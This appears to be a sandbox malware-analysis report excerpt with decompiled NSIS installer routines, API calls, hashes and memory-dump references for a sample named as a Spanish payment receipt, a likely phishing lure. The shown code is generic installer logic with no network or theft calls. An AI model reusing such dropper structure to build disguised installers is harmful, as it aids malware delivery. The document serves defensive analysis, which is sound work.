                                        • Opcode Fuzzy Hash: 08381414c6e739f680c1a14db26c866ed95d6f562d15ae060e4ba8fd4e20cd39
                                        • Instruction Fuzzy Hash: 78017572954241EFE7006BB0AF8AB9A7FB4AF55301F10497EF241B71E2CA7800458F2D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
                                        				short _v132;
                                        				int _t11;
                                        				int _t20;
                                        
                                        				if(_a8 == 0x110) {
                                        					SetTimer(_a4, "true", 0xfa, 0);
                                        					_a8 = 0x113;
                                        				}
                                        				if(_a8 == 0x113) {
                                        					_t20 =  *0x78b6d4; // 0x67a80
                                        					_t11 =  *0x7976dc; // 0x69cc8
                                        					if(_t20 >= _t11) {
                                        						_t20 = _t11;
                                        					}
                                        					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
                                        					SetWindowTextW(_a4,  &_v132);
                                        					SetDlgItemTextW(_a4, 0x406,  &_v132);
                                        				}
                                        				return 0;
                                        			}






                                        0x00402de7
                                        0x00402df5
                                        0x00402dfb
                                        0x00402dfb
                                        0x00402e09
                                        0x00402e0b
                                        0x00402e11
                                        0x00402e18
                                        0x00402e1a
                                        0x00402e1a
                                        0x00402e30
                                        0x00402e40
                                        0x00402e52
                                        0x00402e52
                                        0x00402e5a

                                        APIs
                                        • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402DF5
                                        • MulDiv.KERNEL32(00067A80,00000064,00069CC8), ref: 00402E20
                                        • wsprintfW.USER32 ref: 00402E30
                                        • SetWindowTextW.USER32(?,?), ref: 00402E40
                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                        Strings
                                        • verifying installer: %d%%, xrefs: 00402E2A
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Text$ItemTimerWindowwsprintf
                                        • String ID: verifying installer: %d%%
                                        • API String ID: 1451636040-82062127
                                        • Opcode ID: 3278fe65966c90afb4b572b20ee93d6781e748b995f18389883d07859a761d52
                                        • Instruction ID: c563a075df83d92fb310a5016e42997ab7e5782e6b78b1479044c0af3efb3f55
                                        • Opcode Fuzzy Hash: 3278fe65966c90afb4b572b20ee93d6781e748b995f18389883d07859a761d52
                                        • Instruction Fuzzy Hash: DE01677064020CBFDF149F50DD49FAA3B68AB00304F108039FA06F51D0DBB98965CF59
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 76%
                                        			E100024A4(intOrPtr* _a4) {
                                        				intOrPtr _v4;
                                        				intOrPtr* _t24;
                                        				void* _t26;
                                        				intOrPtr _t27;
                                        				signed int _t35;
                                        				void* _t39;
                                        				intOrPtr _t40;
                                        				void* _t43;
                                        
                                        				_t39 = E1000121B();
                                        				_t24 = _a4;
                                        				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
                                        				_v4 = _t40;
                                        				_t43 = (_t40 + 0x81 << 5) + _t24;
                                        				do {
                                        					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
                                        					}
                                        					_t35 =  *(_t43 - 8);
                                        					if(_t35 <= 7) {
                                        						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
                                        							case 0:
                                        								 *_t39 =  *_t39 & 0x00000000;
                                        								goto L15;
                                        							case 1:
                                        								_push( *__eax);
                                        								goto L13;
                                        							case 2:
                                        								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
                                        								goto L14;
                                        							case 3:
                                        								__ecx =  *0x1000406c;
                                        								__edx = __ecx - 1;
                                        								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
                                        								__eax =  *0x1000406c;
                                        								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
                                        								goto L15;
                                        							case 4:
                                        								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
                                        								goto L15;
                                        							case 5:
                                        								_push( *0x1000406c);
                                        								_push(__edi);
                                        								_push( *__eax);
                                        								__imp__StringFromGUID2();
                                        								goto L15;
                                        							case 6:
                                        								_push( *__esi);
                                        								L13:
                                        								__eax = wsprintfW(__edi, __ebp);
                                        								L14:
                                        								__esp = __esp + 0xc;
                                        								goto L15;
                                        						}
                                        					}
                                        					L15:
                                        					_t26 =  *(_t43 + 0x14);
                                        					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
                                        						GlobalFree(_t26);
                                        					}
                                        					_t27 =  *((intOrPtr*)(_t43 + 0xc));
                                        					if(_t27 != 0) {
                                        						if(_t27 != 0xffffffff) {
                                        							if(_t27 > 0) {
                                        								E100012E1(_t27 - 1, _t39);
                                        								goto L24;
                                        							}
                                        						} else {
                                        							E10001272(_t39);
                                        							L24:
                                        						}
                                        					}
                                        					_v4 = _v4 - 1;
                                        					_t43 = _t43 - 0x20;
                                        				} while (_v4 >= 0);
                                        				return GlobalFree(_t39);
                                        			}











                                        0x100024ae
                                        0x100024b0
                                        0x100024bf
                                        0x100024c5
                                        0x100024d2
                                        0x100024d4
                                        0x100024d8
                                        0x100024d8
                                        0x100024e0
                                        0x100024e6
                                        0x100024e8
                                        0x00000000
                                        0x100024ef
                                        0x00000000
                                        0x00000000
                                        0x100024f5
                                        0x00000000
                                        0x00000000
                                        0x100024ff
                                        0x00000000
                                        0x00000000
                                        0x10002506
                                        0x1000250c
                                        0x10002518
                                        0x1000251e
                                        0x10002523
                                        0x00000000
                                        0x00000000
                                        0x10002545
                                        0x00000000
                                        0x00000000
                                        0x1000252b
                                        0x10002531
                                        0x10002532
                                        0x10002534
                                        0x00000000
                                        0x00000000
                                        0x1000254d
                                        0x1000254f
                                        0x10002551
                                        0x10002553
                                        0x10002553
                                        0x00000000
                                        0x00000000
                                        0x100024e8
                                        0x10002556
                                        0x10002556
                                        0x1000255b
                                        0x1000256d
                                        0x1000256d
                                        0x10002573
                                        0x10002578
                                        0x1000257d
                                        0x10002589
                                        0x1000258e
                                        0x00000000
                                        0x10002593
                                        0x1000257f
                                        0x10002580
                                        0x10002594
                                        0x10002594
                                        0x1000257d
                                        0x10002595
                                        0x10002599
                                        0x1000259c
                                        0x100025b3

                                        APIs
                                          • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                        • GlobalFree.KERNEL32(?), ref: 1000256D
                                        • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2886044792.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000002.00000002.2886017389.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886076658.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886121541.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_10000000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Global$Free$Alloc
                                        • String ID:
                                        • API String ID: 1780285237-0
                                        • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                        • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                        • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                        • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 37%
                                        			E004028A7(void* __ebx) {
                                        				void* _t26;
                                        				long _t31;
                                        				void* _t45;
                                        				void* _t49;
                                        				void* _t51;
                                        				void* _t54;
                                        				void* _t55;
                                        				void* _t56;
                                        
                                        				_t45 = __ebx;
                                        				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
                                        				_t50 = E00402C37(0xfffffff0);
                                        				 *(_t56 - 0x38) = _t23;
                                        				if(E00405BA7(_t50) == 0) {
                                        					E00402C37(0xffffffed);
                                        				}
                                        				E00405D2C(_t50);
                                        				_t26 = E00405D51(_t50, 0x40000000, 2);
                                        				 *(_t56 + 8) = _t26;
                                        				if(_t26 != 0xffffffff) {
                                        					_t31 =  *0x7a8a38;
                                        					 *(_t56 - 0x3c) = _t31;
                                        					_t49 = GlobalAlloc(0x40, _t31);
                                        					if(_t49 != _t45) {
                                        						E00403308(_t45);
                                        						E004032F2(_t49,  *(_t56 - 0x3c));
                                        						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                        						 *(_t56 - 0x4c) = _t54;
                                        						if(_t54 != _t45) {
                                        							_push( *(_t56 - 0x20));
                                        							_push(_t54);
                                        							_push(_t45);
                                        							_push( *((intOrPtr*)(_t56 - 0x24)));
                                        							E004030FA();
                                        							while( *_t54 != _t45) {
                                        								_t47 =  *_t54;
                                        								_t55 = _t54 + 8;
                                        								 *(_t56 - 0x34) =  *_t54;
                                        								E00405D0C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                        								_t54 = _t55 +  *(_t56 - 0x34);
                                        							}
                                        							GlobalFree( *(_t56 - 0x4c));
                                        						}
                                        						E00405E03( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
                                        						GlobalFree(_t49);
                                        						_push(_t45);
                                        						_push(_t45);
                                        						_push( *(_t56 + 8));
                                        						_push(0xffffffff);
                                        						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA();
                                        					}
                                        					CloseHandle( *(_t56 + 8));
                                        				}
                                        				_t51 = 0xfffffff3;
                                        				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
                                        					_t51 = 0xffffffef;
                                        					DeleteFileW( *(_t56 - 0x38));
                                        					 *((intOrPtr*)(_t56 - 4)) = 1;
                                        				}
                                        				_push(_t51);
                                        				E00401423();
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t56 - 4));
                                        				return 0;
                                        			}











                                        0x004028a7
                                        0x004028a9
                                        0x004028b5
                                        0x004028b8
                                        0x004028c2
                                        0x004028c6
                                        0x004028c6
                                        0x004028cc
                                        0x004028d9
                                        0x004028e1
                                        0x004028e4
                                        0x004028ea
                                        0x004028f8
                                        0x004028fd
                                        0x00402901
                                        0x00402904
                                        0x0040290d
                                        0x00402919
                                        0x0040291d
                                        0x00402920
                                        0x00402922
                                        0x00402925
                                        0x00402926
                                        0x00402927
                                        0x0040292a
                                        0x00402949
                                        0x00402931
                                        0x00402936
                                        0x0040293e
                                        0x00402941
                                        0x00402946
                                        0x00402946
                                        0x00402950
                                        0x00402950
                                        0x0040295d
                                        0x00402963
                                        0x00402969
                                        0x0040296a
                                        0x0040296b
                                        0x0040296e
                                        0x00402975
                                        0x00402975
                                        0x0040297b
                                        0x0040297b
                                        0x00402986
                                        0x00402987
                                        0x0040298b
                                        0x0040298f
                                        0x00402995
                                        0x00402995
                                        0x0040299c
                                        0x00402245
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
                                        • GlobalFree.KERNEL32(?), ref: 00402950
                                        • GlobalFree.KERNEL32(00000000), ref: 00402963
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                        • String ID:
                                        • API String ID: 2667972263-0
                                        • Opcode ID: c80f1b7699c573d2cd61cc0fc8ca34bd45e7fada534f6731a09c6b940c6eaf41
                                        • Instruction ID: bbedb4fc7ab5ed61472c20f64d7886a30c327f5f8cbd10d414b970b30e546654
                                        • Opcode Fuzzy Hash: c80f1b7699c573d2cd61cc0fc8ca34bd45e7fada534f6731a09c6b940c6eaf41
                                        • Instruction Fuzzy Hash: E021DDB1800128BBCF206FA5DE49D9E7E79EF08364F10423AF960762E0CB394D418F98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 88%
                                        			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
                                        				signed int _t14;
                                        				int _t17;
                                        				int _t24;
                                        				signed int _t29;
                                        				intOrPtr* _t32;
                                        				void* _t34;
                                        				void* _t35;
                                        				void* _t38;
                                        				signed int _t40;
                                        
                                        				_t32 = __esi;
                                        				_t24 = __ebx;
                                        				_t14 =  *(_t35 - 0x20);
                                        				_t38 = __edx - 0x38;
                                        				 *(_t35 - 0x4c) = _t14;
                                        				_t27 = 0 | _t38 == 0x00000000;
                                        				_t29 = _t38 == 0;
                                        				if(_t14 == __ebx) {
                                        					if(__edx != 0x38) {
                                        						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
                                        					} else {
                                        						E00402C37(0x21);
                                        						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsz62F8.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsz62F8.tmp\System.dll", 0x400, __ebx, __ebx);
                                        						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsz62F8.tmp\System.dll");
                                        					}
                                        				} else {
                                        					E00402C15("true");
                                        					 *0x40ada8 = __ax;
                                        					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
                                        				}
                                        				 *(_t35 + 8) = _t17;
                                        				if( *_t32 == _t24) {
                                        					L13:
                                        					 *((intOrPtr*)(_t35 - 4)) = 1;
                                        				} else {
                                        					_t34 = E004061BF(_t27, _t32);
                                        					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405E32(_t34, _t34) >= 0) {
                                        						_t14 = E00405E03(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsz62F8.tmp\System.dll",  *(_t35 + 8));
                                        						_t40 = _t14;
                                        						if(_t40 == 0) {
                                        							goto L13;
                                        						}
                                        					} else {
                                        						goto L13;
                                        					}
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t35 - 4));
                                        				return 0;
                                        			}












                                        0x00402592
                                        0x00402592
                                        0x00402592
                                        0x00402597
                                        0x0040259a
                                        0x0040259d
                                        0x004025a2
                                        0x004025a4
                                        0x004025c4
                                        0x00402602
                                        0x004025c6
                                        0x004025c8
                                        0x004025e2
                                        0x004025ed
                                        0x004025ed
                                        0x004025a6
                                        0x004025a8
                                        0x004025ad
                                        0x004025bb
                                        0x004025be
                                        0x00402607
                                        0x0040260a
                                        0x00402885
                                        0x00402885
                                        0x00402610
                                        0x00402619
                                        0x0040261b
                                        0x0040263a
                                        0x004015b4
                                        0x004015b6
                                        0x00000000
                                        0x004015bc
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040261b
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWidelstrlen
                                        • String ID: C:\Users\user\AppData\Local\Temp\nsz62F8.tmp$C:\Users\user\AppData\Local\Temp\nsz62F8.tmp\System.dll
                                        • API String ID: 3109718747-3268672159
                                        • Opcode ID: b12df498abedb34b717a172da15718af2b4b4c367ff4dc2f2e44eabaa543b304
                                        • Instruction ID: aeea25b17c56a12648c97371da72875efc2076f5b2bafbb971aab2720b62453c
                                        • Opcode Fuzzy Hash: b12df498abedb34b717a172da15718af2b4b4c367ff4dc2f2e44eabaa543b304
                                        • Instruction Fuzzy Hash: B5115B72A00200BECB106FB18E8D99F7664AF95389F20843FF502F22C1DAFC49425B5E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 85%
                                        			E100022D0(void* __edx) {
                                        				void* _t37;
                                        				signed int _t38;
                                        				void* _t39;
                                        				void* _t41;
                                        				signed int* _t42;
                                        				signed int* _t51;
                                        				void* _t52;
                                        				void* _t54;
                                        
                                        				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
                                        				while(1) {
                                        					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
                                        					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
                                        					_t52 = _t51[6];
                                        					if(_t52 == 0) {
                                        						goto L9;
                                        					}
                                        					_t41 = 0x1a;
                                        					if(_t52 == _t41) {
                                        						goto L9;
                                        					}
                                        					if(_t52 != 0xffffffff) {
                                        						if(_t52 <= 0 || _t52 > 0x19) {
                                        							_t51[6] = _t41;
                                        							goto L12;
                                        						} else {
                                        							_t37 = E100012BA(_t52 - 1);
                                        							L10:
                                        							goto L11;
                                        						}
                                        					} else {
                                        						_t37 = E10001243();
                                        						L11:
                                        						_t52 = _t37;
                                        						L12:
                                        						_t13 =  &(_t51[2]); // 0x1020
                                        						_t42 = _t13;
                                        						if(_t51[1] != 0xffffffff) {
                                        						}
                                        						_t38 =  *_t51;
                                        						_t51[7] = 0;
                                        						if(_t38 > 7) {
                                        							L27:
                                        							_t39 = GlobalFree(_t52);
                                        							if( *(_t54 + 0x10) == 0) {
                                        								return _t39;
                                        							}
                                        							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
                                        								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
                                        							} else {
                                        								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
                                        							}
                                        							continue;
                                        						} else {
                                        							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
                                        								case 0:
                                        									 *_t42 = 0;
                                        									goto L27;
                                        								case 1:
                                        									__eax = E10001311(__ebp);
                                        									goto L21;
                                        								case 2:
                                        									 *__edi = E10001311(__ebp);
                                        									__edi[1] = __edx;
                                        									goto L27;
                                        								case 3:
                                        									__eax = GlobalAlloc(0x40,  *0x1000406c);
                                        									 *(__esi + 0x1c) = __eax;
                                        									__edx = 0;
                                        									 *__edi = __eax;
                                        									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
                                        									goto L27;
                                        								case 4:
                                        									__eax = E1000122C(__ebp);
                                        									 *(__esi + 0x1c) = __eax;
                                        									L21:
                                        									 *__edi = __eax;
                                        									goto L27;
                                        								case 5:
                                        									__eax = GlobalAlloc(0x40, 0x10);
                                        									_push(__eax);
                                        									 *(__esi + 0x1c) = __eax;
                                        									_push(__ebp);
                                        									 *__edi = __eax;
                                        									__imp__CLSIDFromString();
                                        									goto L27;
                                        								case 6:
                                        									if( *__ebp != __cx) {
                                        										__eax = E10001311(__ebp);
                                        										 *__ebx = __eax;
                                        									}
                                        									goto L27;
                                        								case 7:
                                        									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
                                        									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                        									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
                                        									asm("cdq");
                                        									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
                                        									goto L27;
                                        							}
                                        						}
                                        					}
                                        					L9:
                                        					_t37 = E1000122C(0x10004044);
                                        					goto L10;
                                        				}
                                        			}











                                        0x100022e4
                                        0x100022e8
                                        0x100022f3
                                        0x100022f3
                                        0x100022fa
                                        0x100022ff
                                        0x00000000
                                        0x00000000
                                        0x10002303
                                        0x10002306
                                        0x00000000
                                        0x00000000
                                        0x1000230b
                                        0x10002316
                                        0x10002326
                                        0x00000000
                                        0x1000231d
                                        0x1000231f
                                        0x10002335
                                        0x00000000
                                        0x10002335
                                        0x1000230d
                                        0x1000230d
                                        0x10002336
                                        0x10002336
                                        0x10002338
                                        0x1000233c
                                        0x1000233c
                                        0x1000233f
                                        0x1000233f
                                        0x10002347
                                        0x1000234e
                                        0x10002351
                                        0x10002410
                                        0x10002411
                                        0x1000241c
                                        0x10002446
                                        0x10002446
                                        0x1000242c
                                        0x10002438
                                        0x1000242e
                                        0x1000242e
                                        0x1000242e
                                        0x00000000
                                        0x10002357
                                        0x10002357
                                        0x00000000
                                        0x1000235e
                                        0x00000000
                                        0x00000000
                                        0x10002366
                                        0x00000000
                                        0x00000000
                                        0x10002374
                                        0x10002376
                                        0x00000000
                                        0x00000000
                                        0x10002397
                                        0x1000239d
                                        0x100023a0
                                        0x100023a2
                                        0x100023b2
                                        0x00000000
                                        0x00000000
                                        0x1000237f
                                        0x10002384
                                        0x10002387
                                        0x10002388
                                        0x00000000
                                        0x00000000
                                        0x100023be
                                        0x100023c4
                                        0x100023c5
                                        0x100023c8
                                        0x100023c9
                                        0x100023cb
                                        0x00000000
                                        0x00000000
                                        0x100023d7
                                        0x100023da
                                        0x100023e6
                                        0x100023e8
                                        0x00000000
                                        0x00000000
                                        0x100023f4
                                        0x10002400
                                        0x10002403
                                        0x10002405
                                        0x10002408
                                        0x00000000
                                        0x00000000
                                        0x10002357
                                        0x10002351
                                        0x1000232b
                                        0x10002330
                                        0x00000000
                                        0x10002330

                                        APIs
                                        • GlobalFree.KERNEL32(00000000), ref: 10002411
                                          • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                        • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2886044792.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000002.00000002.2886017389.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886076658.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886121541.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_10000000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                        • String ID:
                                        • API String ID: 4216380887-0
                                        • Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
                                        • Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
                                        • Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
